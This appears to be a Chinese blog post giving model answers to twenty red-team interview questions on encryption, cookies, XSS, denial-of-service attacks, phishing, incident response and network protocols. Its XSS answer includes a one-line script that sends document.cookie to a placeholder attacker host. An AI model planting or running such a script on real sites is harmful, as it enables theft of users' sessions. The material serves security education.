网上收集的红队面试题详细解析(一)【1-20题】

约 7 分钟读完

网上收集的红队面试题详细解析(一)【1-20题】


1. 对称加密和非对称加密

原理:

  • 对称加密:加密和解密使用同一个密钥,速度快,密钥分发难。
  • 非对称加密:加密和解密使用一对公钥和私钥,安全性高,速度慢。

举例:

  • 对称:AES、DES;非对称:RSA、ECC。

进阶:

  • 实际应用常结合使用,如HTTPS握手。

2. 什么是同源策略?

原理:

  • 浏览器安全机制,限制不同源之间的资源访问,防止恶意网站窃取数据。

举例:

进阶:

  • 可通过CORS跨域资源共享进行授权访问。

3. cookie 存在哪里?可以打开吗?

原理:

  • cookie存储在浏览器本地,可通过开发者工具查看和编辑。

举例:

  • F12打开开发者工具,Application/Cookies标签查看cookie。

进阶:

  • 服务端也能通过HTTP头设置和读取cookie。

4. xss 如何盗取 cookie?

原理:

  • 利用XSS漏洞注入恶意JS代码,读取document.cookie并发送到攻击者服务器。

举例:

<script>fetch('http://evil.com/?c='+document.cookie)</script>

进阶:

  • 若cookie设置了HttpOnly属性,则JS无法读取。

5. xss 有 cookie 一定可以无用户名密码登录吗?

原理:

  • 不一定。部分网站cookie绑定IP、UA或有二次验证,单纯拿到cookie未必能直接登录。

举例:

  • 某些银行网站cookie和设备信息绑定,盗取cookie无法复现登录态。

进阶:

  • 实战中需结合会话机制分析。

6. xss 如何防御?

原理:

  • 输入输出严格过滤,转义特殊字符,设置HttpOnly、Content-Security-Policy等。

举例:

  • 后端对用户输入进行html实体编码,前端设置CSP禁止外部脚本。

进阶:

  • 使用安全框架如OWASP ESAPI,定期安全测试。

7. SYN 攻击原理

原理:

  • 攻击者发送大量SYN包,目标服务器分配资源等待ACK,导致资源耗尽拒绝服务(SYN Flood)。

举例:

  • 使用hping3工具模拟SYN Flood攻击。

进阶:

  • 防御方法:SYN Cookie、限速、流量清洗。

8. 什么是网络钓鱼?

原理:

  • 伪造合法网站或邮件,诱骗用户输入敏感信息(账号、密码)。

举例:

  • 伪造银行登录页面,诱导用户输入账号密码。

进阶:

  • 防御:提高安全意识,检查网址、使用双因素认证。

9. 什么是 CC 攻击?

原理:

  • Challenge Collapsar,利用大量HTTP请求耗尽服务器资源,属于应用层DDoS。

举例:

  • 攻击者用脚本不断请求目标网站页面,导致服务器崩溃。

进阶:

  • 防御:WAF、限流、验证码。

10. Web 服务器被入侵后,怎样进行排查?

原理:

  • 检查异常进程、文件、日志,分析入侵路径和后门。

举例:

  • 查看web目录是否有异常文件,分析access.log和error.log。

进阶:

  • 使用安全工具(如chkrootkit、rkhunter),恢复备份,修补漏洞。

11. dll 文件是什么意思,有什么用?

原理:

  • 动态链接库(DLL),存放可被多个程序调用的函数和资源。

举例:

  • Windows下很多程序依赖dll文件,如user32.dll。

进阶:

  • dll劫持是一种攻击方式,攻击者替换dll实现代码执行。

12. Https 的作用

原理:

  • 用于加密HTTP数据传输,防止中间人窃听和篡改。

举例:

进阶:

  • 通过SSL/TLS协议实现,包含身份认证和数据加密。

13. 防范常见的 Web 攻击

原理:

  • 输入验证、权限控制、加密传输、定期安全测试。

举例:

  • 防SQL注入:参数化查询;防XSS:输出转义。

进阶:

  • 使用WAF、定期漏洞扫描、代码审计。

14. 重要协议分布层

原理:

  • OSI七层模型:物理层、数据链路层、网络层、传输层、会话层、表示层、应用层。
  • TCP/IP模型:网络接口层、网络层、传输层、应用层。

举例:

  • HTTP属于应用层,TCP属于传输层,IP属于网络层。

进阶:

  • 理解协议分层有助于定位安全问题。

15. arp 协议的工作原理

原理:

  • 地址解析协议,将IP地址解析为MAC地址,用于局域网通信。

举例:

  • 主机A广播ARP请求,询问“谁是192.168.1.1”,主机B回应自己的MAC。

进阶:

  • ARP欺骗可导致流量劫持。

16. rip 协议是什么?rip 的工作原理

原理:

  • 路由信息协议(RIP),基于距离矢量算法,定期广播路由表,选择跳数最少的路径。

举例:

  • 路由器每30秒广播一次路由信息。

进阶:

  • RIP适合小型网络,大型网络推荐OSPF/BGP。

17. 什么是 RARP?工作原理

原理:

  • 逆地址解析协议(RARP),通过MAC地址获取IP地址,常用于无盘工作站。

举例:

  • 设备只知道自己的MAC,通过RARP服务器获取IP。

进阶:

  • 已被DHCP取代。

18. OSPF 协议?OSPF 的工作原理

原理:

  • 开放最短路径优先(OSPF),链路状态路由协议,维护全网拓扑,计算最短路径。

举例:

  • 路由器通过LSA交换链路状态,动态更新路由表。

进阶:

  • 适合大型网络,支持分区域管理。

19. TCP 与 UDP 区别总结

原理:

  • TCP:面向连接,可靠传输,顺序保证,慢。
  • UDP:无连接,不保证可靠,速度快,适合实时应用。

举例:

  • TCP用于网页、文件传输;UDP用于视频、语音。

进阶:

  • TCP有三次握手,UDP无握手过程。

20. 什么是三次握手四次挥手?

原理:

  • TCP建立连接需三次握手,断开连接需四次挥手,保证连接可靠和数据完整。

举例:

  • 客户端发送SYN,服务端回应SYN-ACK,客户端回应ACK,连接建立。
  • 断开时双方各自发送FIN和ACK,共四步。

进阶:

  • 握手过程可防止旧连接干扰,挥手确保数据传输完成。

← 网上收集的红队面试题详细解析(三)【41-60题】 红队面试题详细解析(四)【61-80题】 →